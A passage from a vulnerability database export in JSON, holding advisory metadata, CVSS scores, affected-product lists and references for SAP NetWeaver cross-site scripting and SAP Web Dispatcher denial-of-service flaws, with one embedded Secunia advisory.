"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-5263",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201302-164",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------\n\nThe Secunia CSI 5.0 Beta - now available for testing\nFind out more, take a free test drive, and share your opinion with us: \nhttp://secunia.com/blog/242 \n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver \"server\" Cross-Site Scripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA45708\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45708/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45708\n\nRELEASE DATE:\n2011-08-23\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/45708/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45708/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45708\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDmitriy Evdokimov has reported a vulnerability in SAP NetWeaver,\nwhich can be exploited by malicious people to conduct cross-site\nscripting attacks. \n\nInput passed via the \"server\" parameter to the RetrieveMailExamples\nservlet is not properly sanitised before being returned to the user. \n\nSOLUTION:\nApply fixes. Please see the vendor\u0027s advisory for details. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitriy Evdokimov, Digital Security Research Group (DSecRG). \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1553292\n\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=330\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "BID",
"id": "49266"
},
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "104340"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-5263",
"trust": 2.9
},
{
"db": "BID",
"id": "49266",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "45708",
"trust": 2.3
},
{
"db": "CNVD",
"id": "CNVD-2011-3299",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563",
"trust": 0.8
},
{
"db": "XF",
"id": "69331",
"trust": 0.6
},
{
"db": "XF",
"id": "20110819",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20111117 [DSECRG-11-030] SAP NETWEAVER JAVAMAILEXAMPLES - XSS",
"trust": 0.6
},
{
"db": "IVD",
"id": "7C5C70E2-1F8B-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "104340",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "BID",
"id": "49266"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "PACKETSTORM",
"id": "104340"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"id": "VAR-201302-0006",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
}
],
"trust": 1.2931946133333334
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
}
]
},
"last_update_date": "2023-12-18T13:09:36.143000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Archive for Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"title": "Patch for SAP Netweaver \u0027server\u0027 parameter cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4839"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/45708"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-5263"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-5263"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/45708/http"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/69331"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/520551/100/0/threaded"
},
{
"trust": 0.4,
"url": "https://service.sap.com/sap/support/notes/1553292"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45708"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/242"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45708/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45708/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "BID",
"id": "49266"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "PACKETSTORM",
"id": "104340"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "BID",
"id": "49266"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "PACKETSTORM",
"id": "104340"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-23T00:00:00",
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"date": "2011-08-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"date": "2011-08-19T00:00:00",
"db": "BID",
"id": "49266"
},
{
"date": "2013-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"date": "2011-08-22T08:49:45",
"db": "PACKETSTORM",
"id": "104340"
},
{
"date": "2013-02-12T20:55:03.823000",
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"date": "2013-02-14T12:21:00",
"db": "BID",
"id": "49266"
},
{
"date": "2013-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"date": "2018-10-09T19:33:50.140000",
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver \u0027server\u0027 Parameter Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "104340"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
],
"trust": 0.7
}
}
var-202204-0880
Vulnerability from variot
Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202204-0880",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc_7.22"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.85"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.81"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.85"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.77"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.49"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64nuc_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.77"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.86"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.86"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.81"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "kernel_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.22ext"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28773"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.77:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.49:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.77:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28773"
}
]
},
"cve": "CVE-2022-28773",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2022-28773",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-28773",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202204-3154",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-28773",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"db": "VULMON",
"id": "CVE-2022-28773"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-28773",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3154",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-28773",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"id": "VAR-202204-0880",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:55:06.611000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Web Dispatcher and SAP Internet Communication Manager Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=190238"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-674",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28773"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3111293"
},
{
"trust": 1.7,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-28773/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-de-decembre-2021-38045"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/400.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-12T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"date": "2022-04-12T17:15:10.883000",
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"date": "2022-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-20T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28773"
},
{
"date": "2023-08-14T14:15:09.747000",
"db": "NVD",
"id": "CVE-2022-28773"
},
{
"date": "2023-07-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Web Dispatcher and SAP Internet Communication Manager Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3154"
}
],
"trust": 0.6
}
}
var-201007-0623
Vulnerability from variot
The System Landscape Directory of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. NetWeaver 6.4 through 7.02 are vulnerable.
Show details on source website{
"@context": {
